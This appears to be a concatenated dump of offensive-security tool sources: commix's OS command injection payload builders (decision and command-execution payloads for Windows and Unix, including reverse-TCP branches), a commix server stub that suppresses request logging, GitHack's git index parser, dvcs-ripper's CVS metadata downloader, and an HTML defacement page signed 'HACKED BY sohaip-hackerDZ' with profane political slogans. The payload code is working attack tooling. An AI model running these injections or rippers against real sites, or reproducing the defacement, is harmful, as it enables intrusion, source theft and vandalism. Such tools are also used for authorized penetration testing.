self.wfile.write(settings.APPLICATION + "/v" + settings.VERSION) # NOTE(review): no status line or headers are sent on this branch, only the body text. 97 | 98 | def log_message(self, format, *args): # Overrides the base handler's log_message to do nothing, so requests served here leave no log line. 99 | return 100 | 101 | class ReusableTCPServer(SocketServer.TCPServer): # TCPServer with allow_reuse_address switched on. 102 | allow_reuse_address = True 103 | 104 | def main(): 105 | try: 106 | connection_refused = False 107 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 108 | except socket_error: 109 | if errno.ECONNREFUSED: 110 | connection_refused = True 111 | if connection_refused == False: 112 | # Start the server in a background thread.
113 | httpd = ReusableTCPServer(('', settings.LOCAL_HTTP_PORT), Handler) 114 | thread.start_new_thread(httpd.serve_forever, ()) 115 | -------------------------------------------------------------------------------- /commix/src/core/injections/semiblind/techniques/file_based/fb_payloads.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | """ 17 | The "file-based" technique on semiblind OS command injection. 18 | The available "file-based" payloads. 19 | """ 20 | 21 | from src.utils import menu 22 | from src.utils import settings 23 | 24 | """ 25 | File-based decision payload (check if host is vulnerable). 26 | """ 27 | def decision(separator, TAG, OUTPUT_TEXTFILE): 28 | 29 | if settings.TARGET_OS == "win": 30 | payload = (separator + 31 | "powershell.exe -InputFormat none Add-Content " + 32 | OUTPUT_TEXTFILE + " " + TAG 33 | ) 34 | else: 35 | payload = (separator + 36 | "echo " + TAG + ">" + settings.WEB_ROOT + OUTPUT_TEXTFILE 37 | ) 38 | 39 | return payload 40 | 41 | """ 42 | __Warning__: The alternative shells are still experimental. 
43 | """ 44 | def decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE): 45 | 46 | if settings.TARGET_OS == "win": 47 | python_payload = settings.WIN_PYTHON_DIR + " -c \"open('" + OUTPUT_TEXTFILE + "','w').write('" + TAG + "')\"" 48 | payload = (separator + 49 | "for /f \"tokens=*\" %i in ('cmd /c " + 50 | python_payload + 51 | "') do @set /p =%i< nul" 52 | ) 53 | else: 54 | payload = (separator + 55 | "$(python -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + TAG + "')\nf.close()\n\")" 56 | ) 57 | 58 | if settings.USER_AGENT_INJECTION == True or \ 59 | settings.REFERER_INJECTION == True or \ 60 | settings.CUSTOM_HEADER_INJECTION == True : 61 | payload = payload.replace("\n", separator) 62 | else: 63 | if not settings.TAMPER_SCRIPTS['base64encode'] and \ 64 | not settings.TAMPER_SCRIPTS['hexencode']: 65 | if settings.TARGET_OS != "win": 66 | payload = payload.replace("\n","%0d") 67 | 68 | return payload 69 | 70 | """ 71 | Execute shell commands on vulnerable host. 72 | """ 73 | def cmd_execution(separator, cmd, OUTPUT_TEXTFILE): 74 | 75 | if settings.TFB_DECIMAL == True: 76 | payload = (separator +cmd) 77 | 78 | elif settings.TARGET_OS == "win": 79 | payload = (separator + 80 | "for /f \"tokens=*\" %i in ('cmd /c \"" + 81 | "powershell.exe -InputFormat none write-host (cmd /c \"" + 82 | cmd + 83 | "\")\"') do @set /p =%i " + ">" + OUTPUT_TEXTFILE + "< nul" 84 | ) 85 | else: 86 | # if settings.USER_AGENT_INJECTION == True or \ 87 | # settings.REFERER_INJECTION == True or \ 88 | # settings.CUSTOM_HEADER_INJECTION == True: 89 | # if not settings.DEL in cmd: 90 | # cmd = "echo $(" + cmd + ")" 91 | payload = (separator + 92 | cmd + ">" + settings.WEB_ROOT + OUTPUT_TEXTFILE 93 | ) 94 | 95 | return payload 96 | 97 | """ 98 | __Warning__: The alternative shells are still experimental. 
99 | """ 100 | def cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE): 101 | if settings.TARGET_OS == "win": 102 | if settings.REVERSE_TCP: 103 | payload = (separator +cmd + " " 104 | ) 105 | else: 106 | python_payload = settings.WIN_PYTHON_DIR + " -c \"import os; os.system('" + cmd + ">" + OUTPUT_TEXTFILE + "')\"" 107 | payload = (separator + 108 | "for /f \"tokens=*\" %i in ('cmd /c " + 109 | python_payload + 110 | "') do @set /p =%i< nul" 111 | ) 112 | else: 113 | payload = (separator + 114 | "$(python -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('$(echo $(" + cmd + "))')\nf.close()\n\")" 115 | ) 116 | 117 | # New line fixation 118 | if settings.USER_AGENT_INJECTION == True or \ 119 | settings.REFERER_INJECTION == True or \ 120 | settings.CUSTOM_HEADER_INJECTION == True: 121 | payload = payload.replace("\n", separator) 122 | else: 123 | if not settings.TAMPER_SCRIPTS['base64encode'] and \ 124 | not settings.TAMPER_SCRIPTS['hexencode']: 125 | if settings.TARGET_OS != "win": 126 | payload = payload.replace("\n","%0d") 127 | 128 | return payload 129 | 130 | #eof -------------------------------------------------------------------------------- /commix/src/core/injections/results_based/techniques/classic/cb_payloads.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 
14 | """ 15 | 16 | from src.utils import settings 17 | 18 | """ 19 | The classic injection technique on Classic OS Command Injection. 20 | The available "classic" payloads. 21 | """ 22 | 23 | """ 24 | Classic decision payload (check if host is vulnerable). 25 | """ 26 | def decision(separator, TAG, randv1, randv2): 27 | if settings.TARGET_OS == "win": 28 | if settings.SKIP_CALC: 29 | payload = (separator + 30 | "echo " + TAG + TAG + TAG + "< nul" 31 | ) 32 | else: 33 | payload = (separator + 34 | "for /f \"tokens=*\" %i in ('cmd /c \"" + 35 | "set /a (" + str(randv1) + "%2B" + str(randv2) + ")" + 36 | "\"') do @set /p = " + TAG + "%i" + TAG + TAG + "< nul" 37 | ) 38 | else: 39 | if not settings.WAF_ENABLED: 40 | math_calc = "$((" + str(randv1) + "%2B" + str(randv2) + "))" 41 | else: 42 | math_calc = "$(expr " + str(randv1) + " %2B " + str(randv2) + ")" 43 | if settings.SKIP_CALC: 44 | payload = (separator + 45 | "echo " + TAG + 46 | "$(echo " + TAG + ")" + TAG + "" 47 | ) 48 | else: 49 | payload = (separator + 50 | "echo " + TAG + 51 | math_calc + 52 | "$(echo " + TAG + ")" + TAG + "" 53 | ) 54 | return payload 55 | 56 | """ 57 | __Warning__: The alternative shells are still experimental. 
58 | """ 59 | def decision_alter_shell(separator, TAG, randv1, randv2): 60 | if settings.TARGET_OS == "win": 61 | if settings.SKIP_CALC: 62 | python_payload = settings.WIN_PYTHON_DIR + " -c \"print '" + TAG + "'%2B'" + TAG + "'%2B'" + TAG + "'\"" 63 | else: 64 | python_payload = settings.WIN_PYTHON_DIR + " -c \"print '" + TAG + "'%2Bstr(int(" + str(int(randv1)) + "%2B" + str(int(randv2)) + "))" + "%2B'" + TAG + "'%2B'" + TAG + "'\"" 65 | 66 | payload = (separator + 67 | "for /f \"tokens=*\" %i in ('cmd /c " + 68 | python_payload + 69 | "') do @set /p =%i< nul" 70 | ) 71 | else: 72 | if settings.SKIP_CALC: 73 | payload = (separator + 74 | "python -c \"print'" + TAG + 75 | TAG + 76 | TAG + "'\"" 77 | ) 78 | else: 79 | payload = (separator + 80 | "python -c \"print'" + TAG + 81 | "'%2Bstr(int(" + str(int(randv1)) + "%2B" + str(int(randv2)) + "))" + "%2B'" + 82 | TAG + "'%2B'" + 83 | TAG + "'\"" 84 | ) 85 | return payload 86 | 87 | """ 88 | Execute shell commands on vulnerable host. 89 | """ 90 | def cmd_execution(separator, TAG, cmd): 91 | if settings.TARGET_OS == "win": 92 | if settings.REVERSE_TCP: 93 | payload = (separator + cmd + " " 94 | ) 95 | else: 96 | payload = (separator + 97 | "for /f \"tokens=*\" %i in ('cmd /c \"" + 98 | cmd + 99 | "\"') do @set /p = " + TAG + TAG + "%i" + TAG + TAG + "< nul" 100 | ) 101 | else: 102 | if not settings.WAF_ENABLED: 103 | cmd_exec = "$(echo $(" + cmd + "))" 104 | else: 105 | cmd_exec = "$(" + cmd + ")" 106 | payload = (separator + 107 | "echo " + TAG + 108 | "$(echo " + TAG + ")" + 109 | cmd_exec + 110 | "$(echo " + TAG + ")" + TAG + "" 111 | ) 112 | return payload 113 | 114 | """ 115 | __Warning__: The alternative shells are still experimental. 
116 | """ 117 | def cmd_execution_alter_shell(separator, TAG, cmd): 118 | if settings.TARGET_OS == "win": 119 | if settings.REVERSE_TCP: 120 | payload = (separator +cmd + " " 121 | ) 122 | else: 123 | payload = (separator + 124 | "for /f \"tokens=*\" %i in ('" + 125 | settings.WIN_PYTHON_DIR + " -c \"import os; os.system('powershell.exe -InputFormat none write-host " + TAG + TAG + " $(" + cmd + ") "+ TAG + TAG + "')\"" + 126 | "') do @set /p =%i< nul" 127 | ) 128 | 129 | else: 130 | payload = (separator + 131 | "python -c \"print'" + TAG + "'%2B'" + TAG + "'%2B'$(echo $(" +cmd+ "))'%2B'" + TAG + "'%2B'" + TAG + "'\"" 132 | ) 133 | return payload 134 | 135 | #eof 136 | -------------------------------------------------------------------------------- /GitHack/lib/parser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # https://github.com/git/git/blob/master/Documentation/technical/index-format.txt 4 | # 5 | 6 | import binascii 7 | import collections 8 | import mmap 9 | import struct 10 | import sys 11 | 12 | 13 | def check(boolean, message): 14 | if not boolean: 15 | import sys 16 | print "error: " + message 17 | sys.exit(1) 18 | 19 | 20 | def parse(filename, pretty=True): 21 | with open(filename, "rb") as o: 22 | f = mmap.mmap(o.fileno(), 0, access=mmap.ACCESS_READ) 23 | 24 | def read(format): 25 | # "All binary numbers are in network byte order." 26 | # Hence "!" = network order, big endian 27 | format = "! 
" + format 28 | bytes = f.read(struct.calcsize(format)) 29 | return struct.unpack(format, bytes)[0] 30 | 31 | index = collections.OrderedDict() 32 | 33 | # 4-byte signature, b"DIRC" 34 | index["signature"] = f.read(4).decode("ascii") 35 | check(index["signature"] == "DIRC", "Not a Git index file") 36 | 37 | # 4-byte version number 38 | index["version"] = read("I") 39 | check(index["version"] in {2, 3}, 40 | "Unsupported version: %s" % index["version"]) 41 | 42 | # 32-bit number of index entries, i.e. 4-byte 43 | index["entries"] = read("I") 44 | 45 | yield index 46 | 47 | for n in range(index["entries"]): 48 | entry = collections.OrderedDict() 49 | 50 | entry["entry"] = n + 1 51 | 52 | entry["ctime_seconds"] = read("I") 53 | entry["ctime_nanoseconds"] = read("I") 54 | if pretty: 55 | entry["ctime"] = entry["ctime_seconds"] 56 | entry["ctime"] += entry["ctime_nanoseconds"] / 1000000000 57 | del entry["ctime_seconds"] 58 | del entry["ctime_nanoseconds"] 59 | 60 | entry["mtime_seconds"] = read("I") 61 | entry["mtime_nanoseconds"] = read("I") 62 | if pretty: 63 | entry["mtime"] = entry["mtime_seconds"] 64 | entry["mtime"] += entry["mtime_nanoseconds"] / 1000000000 65 | del entry["mtime_seconds"] 66 | del entry["mtime_nanoseconds"] 67 | 68 | entry["dev"] = read("I") 69 | entry["ino"] = read("I") 70 | 71 | # 4-bit object type, 3-bit unused, 9-bit unix permission 72 | entry["mode"] = read("I") 73 | if pretty: 74 | entry["mode"] = "%06o" % entry["mode"] 75 | 76 | entry["uid"] = read("I") 77 | entry["gid"] = read("I") 78 | entry["size"] = read("I") 79 | 80 | entry["sha1"] = binascii.hexlify(f.read(20)).decode("ascii") 81 | entry["flags"] = read("H") 82 | 83 | # 1-bit assume-valid 84 | entry["assume-valid"] = bool(entry["flags"] & (0b10000000 << 8)) 85 | # 1-bit extended, must be 0 in version 2 86 | entry["extended"] = bool(entry["flags"] & (0b01000000 << 8)) 87 | # 2-bit stage (?) 
88 | stage_one = bool(entry["flags"] & (0b00100000 << 8)) 89 | stage_two = bool(entry["flags"] & (0b00010000 << 8)) 90 | entry["stage"] = stage_one, stage_two 91 | # 12-bit name length, if the length is less than 0xFFF (else, 0xFFF) 92 | namelen = entry["flags"] & 0xFFF 93 | 94 | # 62 bytes so far 95 | entrylen = 62 96 | 97 | if entry["extended"] and (index["version"] == 3): 98 | entry["extra-flags"] = read("H") 99 | # 1-bit reserved 100 | entry["reserved"] = bool(entry["extra-flags"] & (0b10000000 << 8)) 101 | # 1-bit skip-worktree 102 | entry["skip-worktree"] = bool(entry["extra-flags"] & (0b01000000 << 8)) 103 | # 1-bit intent-to-add 104 | entry["intent-to-add"] = bool(entry["extra-flags"] & (0b00100000 << 8)) 105 | # 13-bits unused 106 | # used = entry["extra-flags"] & (0b11100000 << 8) 107 | # check(not used, "Expected unused bits in extra-flags") 108 | entrylen += 2 109 | 110 | if namelen < 0xFFF: 111 | entry["name"] = f.read(namelen).decode("utf-8", "replace") 112 | entrylen += namelen 113 | else: 114 | # Do it the hard way 115 | name = [] 116 | while True: 117 | byte = f.read(1) 118 | if byte == "\x00": 119 | break 120 | name.append(byte) 121 | entry["name"] = b"".join(name).decode("utf-8", "replace") 122 | entrylen += 1 123 | 124 | padlen = (8 - (entrylen % 8)) or 8 125 | nuls = f.read(padlen) 126 | check(set(nuls) == set(['\x00']), "padding contained non-NUL") 127 | 128 | yield entry 129 | 130 | f.close() 131 | 132 | 133 | 134 | 135 | 136 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/index: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | HACKED BY sohaip-hackerDZ 8 | 9 | 10 | 16 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 37 | 87 | 88 |
27 |
28 | 35 |
36 |
38 | 39 | 40 | 75 | 84 | 85 |
41 |
42 |   HACKED BY sohaip-hackerDZ
43 | 
44 | ----------------------------------
45 | Fuck   Russia and United States and France and United Kingdom
46 | 
47 | لا اله الا الله محمد رسول الله IAM Muslim
48 | 
49 | 
50 | 
51 | 
52 | 
53 | -----------------------------------
54 | hackerz Algeria from here !!!
55 | free Palestine !!
56 | 
57 | 
58 | 
59 | 
60 | 
61 | 
62 | Anonymous -We are legion, We do not forgive, We do not forget,Expect us!
63 | We are
64 | sohaip-hackerDZ :: Daher.Ps :: groups spyhackerz :: groups 3F.Team.iq 
65 | 
66 | 
67 | ----------------------------------
68 | 
69 | [+]sohaip-hackerDZ[+] | [+]sohaip-hackerDZ[+]  | [+]sohaip-hackerDZ[+]
70 | 	 
72 | 
73 | 
74 |
76 | 77 | 78 | 79 | 80 | 81 | 82 |
83 |
86 |
89 |
90 |
91 | 92 | -------------------------------------------------------------------------------- /commix/src/core/requests/redirection.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import sys 17 | import urllib2 18 | from src.utils import menu 19 | from src.utils import settings 20 | from src.thirdparty.colorama import Fore, Back, Style, init 21 | 22 | def do_check(url): 23 | """ 24 | This functinality is based on Filippo's Valsorda script [1] 25 | which uses HEAD requests (with fallback in case of 405) 26 | to follow the redirect path up to the real URL. 27 | --- 28 | [1] https://gist.github.com/FiloSottile/2077115 29 | """ 30 | class HeadRequest(urllib2.Request): 31 | def get_method(self): 32 | return "HEAD" 33 | 34 | class HEADRedirectHandler(urllib2.HTTPRedirectHandler): 35 | """ 36 | Subclass the HTTPRedirectHandler to make it use our 37 | HeadRequest also on the redirected URL 38 | """ 39 | def redirect_request(self, req, fp, code, msg, headers, redirected_url): 40 | if code in (301, 302, 303, 307): 41 | redirected_url = redirected_url.replace(' ', '%20') 42 | newheaders = dict((k,v) for k,v in req.headers.items() 43 | if k.lower() not in ("content-length", "content-type")) 44 | warn_msg = "Got a " + str(code) + " redirection (" + redirected_url + ")." 
45 | print settings.print_warning_msg(warn_msg) 46 | return HeadRequest(redirected_url, 47 | headers = newheaders, 48 | origin_req_host = req.get_origin_req_host(), 49 | unverifiable = True 50 | ) 51 | else: 52 | err_msg = str(urllib2.HTTPError(req.get_full_url(), code, msg, headers, fp)).replace(": "," (") 53 | print settings.print_critical_msg(err_msg + ").") 54 | raise SystemExit() 55 | 56 | class HTTPMethodFallback(urllib2.BaseHandler): 57 | """ 58 | Fallback to GET if HEAD is not allowed (405 HTTP error) 59 | """ 60 | def http_error_405(self, req, fp, code, msg, headers): 61 | fp.read() 62 | fp.close() 63 | 64 | newheaders = dict((k,v) for k,v in req.headers.items() if k.lower() not in ("content-length", "content-type")) 65 | return self.parent.open(urllib2.Request(req.get_full_url(), 66 | headers = newheaders, 67 | origin_req_host = req.get_origin_req_host(), 68 | unverifiable = True) 69 | ) 70 | 71 | # Build our opener 72 | opener = urllib2.OpenerDirector() 73 | # Check if defined any HTTP Host header. 74 | if menu.options.host: 75 | opener.addheaders.append(('Host', menu.options.host)) 76 | # Check if defined any HTTP User-Agent header. 77 | if menu.options.agent: 78 | opener.addheaders.append(('User-Agent', menu.options.agent)) 79 | # Check if defined any HTTP Referer header. 80 | if menu.options.referer and settings.REFERER_INJECTION == False: 81 | opener.addheaders.append(('Referer', menu.options.referer)) 82 | # Check if defined any HTTP Cookie header. 
83 | if menu.options.cookie and settings.COOKIE_INJECTION == False: 84 | opener.addheaders.append(('Cookie', menu.options.cookie)) 85 | 86 | for handler in [urllib2.HTTPHandler, 87 | HTTPMethodFallback, 88 | HEADRedirectHandler, 89 | urllib2.HTTPErrorProcessor, 90 | urllib2.HTTPSHandler]: 91 | opener.add_handler(handler()) 92 | try: 93 | response = opener.open(HeadRequest(url)) 94 | redirected_url = response.geturl() 95 | 96 | if redirected_url != url: 97 | while True: 98 | if not menu.options.batch: 99 | question_msg = "Do you want to follow the identified redirection? [Y/n] > " 100 | sys.stdout.write(settings.print_question_msg(question_msg)) 101 | redirection_option = sys.stdin.readline().replace("\n","").lower() 102 | else: 103 | redirection_option = "" 104 | if len(redirection_option) == 0 or redirection_option in settings.CHOICE_YES: 105 | if menu.options.batch: 106 | info_msg = "Following redirection to '" + redirected_url + "'. " 107 | print settings.print_info_msg(info_msg) 108 | return redirected_url 109 | elif redirection_option in settings.CHOICE_NO: 110 | return url 111 | elif redirection_option in settings.CHOICE_QUIT: 112 | sys.exit(0) 113 | else: 114 | err_msg = "'" + redirection_option + "' is not a valid answer." 
115 | print settings.print_error_msg(err_msg) 116 | pass 117 | else: 118 | return url 119 | 120 | except urllib2.HTTPError, err: 121 | err_msg = str(err).replace(": "," (") 122 | print settings.print_critical_msg(err_msg + ").") 123 | raise SystemExit() 124 | -------------------------------------------------------------------------------- /dvcs-ripper/rip-cvs.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use strict; 4 | 5 | use IO::Socket::SSL; 6 | use LWP; 7 | use LWP::UserAgent; 8 | use HTTP::Request; 9 | use Getopt::Long; 10 | 11 | my $configfile="$ENV{HOME}/.rip-cvs"; 12 | my %config; 13 | $config{'branch'} = "HEAD"; 14 | $config{'scmdir'} = "CVS"; 15 | $config{'agent'} = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:10.0.2) Gecko/20100101 Firefox/10.0.2'; 16 | $config{'verbose'}=0; 17 | $config{'checkout'}=1; 18 | $config{'outdir'}='./'; 19 | $config{'rlevel'}=9; 20 | 21 | if (-e $configfile) { 22 | open(CONFIG,"<$configfile") or next; 23 | while () { 24 | chomp; # no newline 25 | s/#.*//; # no comments 26 | s/^\s+//; # no leading white 27 | s/\s+$//; # no trailing white 28 | next unless length; # anything left? 29 | my ($var, $value) = split(/\s*=\s*/, $_, 2); 30 | $config{$var} = $value; 31 | } 32 | close(CONFIG); 33 | } 34 | 35 | Getopt::Long::Configure ("bundling"); 36 | 37 | my $result = GetOptions ( 38 | "a|agent=s" => \$config{'agent'}, 39 | "b|branch=s" => \$config{'branch'}, 40 | "u|url=s" => \$config{'url'}, 41 | "c|checkout!" => \$config{'checkout'}, 42 | "s|sslignore!" 
=> \$config{'sslignore'}, 43 | "v|verbose+" => \$config{'verbose'}, 44 | "h|help" => \&help 45 | ); 46 | 47 | my @scmfiles=( 48 | "Repository", 49 | "Root", 50 | "Entries" 51 | ); 52 | 53 | if ($config{'verbose'}>3) { 54 | foreach my $key ( keys %config ) 55 | { 56 | print "[c] $key => $config{$key}\n"; 57 | } 58 | } 59 | 60 | my $ua = LWP::UserAgent->new; 61 | $ua->agent($config{'agent'}); 62 | 63 | if ($config{'sslignore'}) { 64 | $ua->ssl_opts(SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE, verify_hostname => 0); 65 | } 66 | 67 | # normalize URL 68 | if ($config{'url'} =~ /\/\CVS/) { 69 | $config{'scmurl'} = $config{'url'}; 70 | $config{'regurl'} = $config{'url'}; 71 | $config{'regurl'} =~ s/\/CVS//; 72 | } else { 73 | $config{'scmurl'} = $config{'url'}."/CVS"; 74 | $config{'regurl'} = $config{'url'}; 75 | } 76 | 77 | processcvs ('',$config{'outdir'},0); 78 | 79 | sub processcvs { 80 | my ($url,$dir,$level) = @_; 81 | createcvsdirs ($dir); 82 | downloadcvsfiles ($url,$dir); 83 | 84 | return if ($level>$config{'rlevel'}); 85 | 86 | my $cntfile; 87 | 88 | my $ident=" "x$level; 89 | 90 | if (-e "$dir/$config{'scmdir'}/Root" and $level==0) { 91 | $cntfile++; 92 | print "$ident"."[i] CVSROOT="; 93 | displayfile("$dir/$config{'scmdir'}/Root"); 94 | } 95 | 96 | if (-e "$dir/$config{'scmdir'}/Repository" and $level==0) { 97 | $cntfile++; 98 | print "$ident"."[i] cvs checkout "; 99 | displayfile("$dir/$config{'scmdir'}/Repository"); 100 | } 101 | 102 | if (-e "$dir/$config{'scmdir'}/Entries") { 103 | $cntfile++; 104 | my $cont=readfile("$dir/$config{'scmdir'}/Entries"); 105 | # print $cont; 106 | # print sprintf "%s%1s %-25s %-14s %22s\n", "T", "Name", "Revision", "Date"; 107 | foreach ( split /\n/, $cont ) { 108 | if (/\//) { 109 | my @rec = split(/\//); 110 | print sprintf "%s%1s %-38s %-14s %22s\n", $ident, $rec[0], $rec[1], $rec[2], $rec[3]; 111 | if ($rec[0] eq 'D') { 112 | mkdir "$dir/$rec[1]"; 113 | processcvs("$url/$rec[1]","$dir/$rec[1]",$level+1); 114 | } 
115 | } 116 | } 117 | } 118 | 119 | if ($level==0) { 120 | if ($cntfile > 0) { 121 | print STDERR "$ident"."[i] CVS identified on $config{'url'} by $cntfile guesses\n"; 122 | } else { 123 | print STDERR "$ident"."[i] CVS not identified, check URL: $config{'url'}\n"; 124 | } 125 | } 126 | 127 | } 128 | 129 | 130 | sub displayfile { 131 | my ($file) = @_; 132 | open (FILE, "<$file") or warn ("cannot open $file: $!"); 133 | while () { 134 | print $_; 135 | } 136 | close (FILE); 137 | } 138 | 139 | sub readfile { 140 | my ($file) = @_; 141 | open (FILE, "<$file") or warn ("cannot open $file: $!"); 142 | my $str; 143 | while () { 144 | $str=$str.$_; 145 | } 146 | close (FILE); 147 | # print ":$str:\n"; 148 | return ($str); 149 | } 150 | 151 | sub createcvsdirs { 152 | my ($dir) = @_; 153 | mkdir $dir."/CVS"; 154 | } 155 | 156 | sub downloadcvsfiles { 157 | my ($url,$dir) = @_; 158 | foreach my $file (@scmfiles) { 159 | my $furl = "$url/$config{'scmdir'}/$file"; 160 | getfile($furl,"$dir/$config{'scmdir'}/$file"); 161 | } 162 | } 163 | 164 | sub getfile { 165 | my ($file,$outfile) = @_; 166 | my $furl = $config{'regurl'}."/".$file; 167 | my $req = HTTP::Request->new(GET => $furl); 168 | # Pass request to the user agent and get a response back 169 | my $res = $ua->request($req); 170 | if ($res->is_success) { 171 | print STDERR "[d] found $file\n" if ($config{'verbose'}>1);; 172 | open (out,">$outfile") or die ("cannot open file '$outfile': $!"); 173 | print out $res->content; 174 | close (out); 175 | } else { 176 | print STDERR "[!] Not found for $furl => $file: ".$res->status_line."\n" 177 | if ($config{'verbose'}>1); 178 | } 179 | return $res; 180 | } 181 | 182 | sub help { 183 | print "DVCS-Ripper: rip-cvs.pl. Copyright (C) Kost. 
Distributed under GPL.\n\n"; 184 | print "Usage: $0 [options] -u [url] \n"; 185 | print "\n"; 186 | print " -c perform 'checkout' on end (default)\n"; 187 | print " -b Use branch (default: $config{'branch'})\n"; 188 | print " -a Use agent (default: $config{'agent'})\n"; 189 | print " -s ignore SSL certification verification\n"; 190 | print " -v verbose (-vv will be more verbose)\n"; 191 | print "\n"; 192 | 193 | print "Example: $0 -v -u http://www.example.com/CVS/\n"; 194 | print "Example: $0 # with url and options in $configfile\n"; 195 | 196 | exit 0; 197 | } 198 | 199 | -------------------------------------------------------------------------------- /commix/src/thirdparty/colorama/win32.py: -------------------------------------------------------------------------------- 1 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 2 | 3 | # from winbase.h 4 | STDOUT = -11 5 | STDERR = -12 6 | 7 | try: 8 | import ctypes 9 | from ctypes import LibraryLoader 10 | windll = LibraryLoader(ctypes.WinDLL) 11 | from ctypes import wintypes 12 | except (AttributeError, ImportError): 13 | windll = None 14 | SetConsoleTextAttribute = lambda *_: None 15 | else: 16 | from ctypes import byref, Structure, c_char, POINTER 17 | 18 | COORD = wintypes._COORD 19 | 20 | class CONSOLE_SCREEN_BUFFER_INFO(Structure): 21 | """struct in wincon.h.""" 22 | _fields_ = [ 23 | ("dwSize", COORD), 24 | ("dwCursorPosition", COORD), 25 | ("wAttributes", wintypes.WORD), 26 | ("srWindow", wintypes.SMALL_RECT), 27 | ("dwMaximumWindowSize", COORD), 28 | ] 29 | def __str__(self): 30 | return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % ( 31 | self.dwSize.Y, self.dwSize.X 32 | , self.dwCursorPosition.Y, self.dwCursorPosition.X 33 | , self.wAttributes 34 | , self.srWindow.Top, self.srWindow.Left, self.srWindow.Bottom, self.srWindow.Right 35 | , self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X 36 | ) 37 | 38 | _GetStdHandle = windll.kernel32.GetStdHandle 39 | _GetStdHandle.argtypes = [ 40 
| wintypes.DWORD, 41 | ] 42 | _GetStdHandle.restype = wintypes.HANDLE 43 | 44 | _GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo 45 | _GetConsoleScreenBufferInfo.argtypes = [ 46 | wintypes.HANDLE, 47 | POINTER(CONSOLE_SCREEN_BUFFER_INFO), 48 | ] 49 | _GetConsoleScreenBufferInfo.restype = wintypes.BOOL 50 | 51 | _SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute 52 | _SetConsoleTextAttribute.argtypes = [ 53 | wintypes.HANDLE, 54 | wintypes.WORD, 55 | ] 56 | _SetConsoleTextAttribute.restype = wintypes.BOOL 57 | 58 | _SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition 59 | _SetConsoleCursorPosition.argtypes = [ 60 | wintypes.HANDLE, 61 | COORD, 62 | ] 63 | _SetConsoleCursorPosition.restype = wintypes.BOOL 64 | 65 | _FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA 66 | _FillConsoleOutputCharacterA.argtypes = [ 67 | wintypes.HANDLE, 68 | c_char, 69 | wintypes.DWORD, 70 | COORD, 71 | POINTER(wintypes.DWORD), 72 | ] 73 | _FillConsoleOutputCharacterA.restype = wintypes.BOOL 74 | 75 | _FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute 76 | _FillConsoleOutputAttribute.argtypes = [ 77 | wintypes.HANDLE, 78 | wintypes.WORD, 79 | wintypes.DWORD, 80 | COORD, 81 | POINTER(wintypes.DWORD), 82 | ] 83 | _FillConsoleOutputAttribute.restype = wintypes.BOOL 84 | 85 | _SetConsoleTitleW = windll.kernel32.SetConsoleTitleA 86 | _SetConsoleTitleW.argtypes = [ 87 | wintypes.LPCSTR 88 | ] 89 | _SetConsoleTitleW.restype = wintypes.BOOL 90 | 91 | handles = { 92 | STDOUT: _GetStdHandle(STDOUT), 93 | STDERR: _GetStdHandle(STDERR), 94 | } 95 | 96 | def GetConsoleScreenBufferInfo(stream_id=STDOUT): 97 | handle = handles[stream_id] 98 | csbi = CONSOLE_SCREEN_BUFFER_INFO() 99 | success = _GetConsoleScreenBufferInfo( 100 | handle, byref(csbi)) 101 | return csbi 102 | 103 | def SetConsoleTextAttribute(stream_id, attrs): 104 | handle = handles[stream_id] 105 | return _SetConsoleTextAttribute(handle, 
